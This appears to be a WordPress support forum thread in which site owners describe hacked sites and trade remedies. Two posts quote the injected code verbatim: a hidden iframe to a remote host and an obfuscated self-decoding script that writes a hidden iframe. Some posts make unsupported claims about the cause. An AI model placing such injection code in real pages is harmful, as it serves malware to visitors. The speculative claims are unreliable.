Someone put a iframe on index.php file

My website is https://morningsundesigns.com/ btw.

restoring a backup, assuming thats what you are trying to do is no more difficult than uploading the files, to EXACTLY where they were before.

if your wp-config.php contains the right info — it connects.

if it doesnt have the right info — it doesnt.

its not any more complicated than that.

So if you cant connect to your database, and youve checked to make sure that it still exists, and that the tables from your old install are still intact, than your wp-config.php that you are trying to use does not have the right info in it.

oh, and btw, unless youve solved the source of your first hacking, you should expect to be hacked again.

I suggest scanning your own local computer(s) for malware.

First of all, thank you so much for replying.

Should I empty my database too?
Anyway, I uploaded my backup config file to my site, but it still don’t work.

I even tried installing WordPress via Fantastico installer.
I got a brand new MySQL database and the default theme came up and worked.
I deleted the files in my new MySQL database and inported it with the files I exported from my old MySQL.
And now it just give me a blank page?

Yes.. look in your database, I think you will need to check whole database. I am not sure if there is any easy way to check this..

I have been having the same problems myself with the index.php file, and others. After a lot of digging about I have found the following post https://forums.digitalpoint.com/showthread.php?t=901622 basically your site has been HACKED the hackers have somehow managed to obtain your FTP or root password so check your computer for key loggers and follow the advise in the above post and see if that will do the job.

definitely a FTP password hack.

I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

The specfic hack code is:
<iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

This code often overwrites the ending php tags in the file and thus brings the site down.

I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

* Gauge how often it’s happening
* Share solutions
* Expose the culprits, if possible
* Alert WP team so they can review possible core level security measures

As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus’ on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.
[link moderated]

definitely a FTP password hack.

I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

This is plain rubbish! I’ve also had sites hacked with both JavaScript injection and iframe. Not only is FTP not used, its not even enabled on the server. Interestingly, the attack vectors show that entry was gained from a core WordPress file.

I had just written a report for the WP core devs when I saw the announcement about the release of WordPress 2.8.1.
Everyone should upgrade as soon as possible.

More information on known vulnerabilities (some of which have been fixed in 2.8.1) is here: https://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=advisory&name=WordPress_Privileges_Unchecked

I’ve had the same kind of issues that last few weeks. All of my indexfiles in the root were altered and all of my php files were changed. They had the following “script” added at the bottom end:

===
?php echo ‘<script>var source=”=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4Djgsbnf&31tsd&4E&33iuuq&4B00gpytfnqsptu/sv0jo/dhj&4G5&33&31xjeui&4E&331&33&31ifjhiu&4E&331&33&31tuzmf&4E&33ejtqmbz&4Bopof&4C&33&4F&4D0jgsbnf&4F(**<=0tdsjqu?”; var result = “”;for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);</script>’; ?>
===

The result was that my site went totally blank, even no error at all. After removing the “script”, the site was back ok. But only for a few days, even hours later, the “script” was back. I did some changes; wp_ changed, file security 644, installed the security plugin, but with no result, the hacks came back.

I just did the upgrade to 281 and I keep my fingers crossed…

Ok, I’m back with more news.

After upgrading to 281 I got hacked again…

I manually scanned with Avast my pc, and I did found some worms and malware in my IE cache, which i suspect did the damage on my website on the first place. Then i changed all of my passwords (sql, ftp, …) and had no more intrusions since.

@baroli3000
do you have Adobe Reader installed? if so, what version?

Thanks for all reply.
It’s solved and I’m really happy that it is not happening anymore! ??

Thanks a lot again!

no adobe reader here nor filezilla
2.8.1 wordpress up and still problems with geting iframe script
ftp pass is chaned, PC is clean ….

hope for better days

it was not hacked our wordpress blog but WordPress main server was hacked and variability was already installed before downloading from WordPress server. All the details regarding this hack is reviewed in magazine called Linux. WordPress main server was hacked and injected malicious.

[link moderated]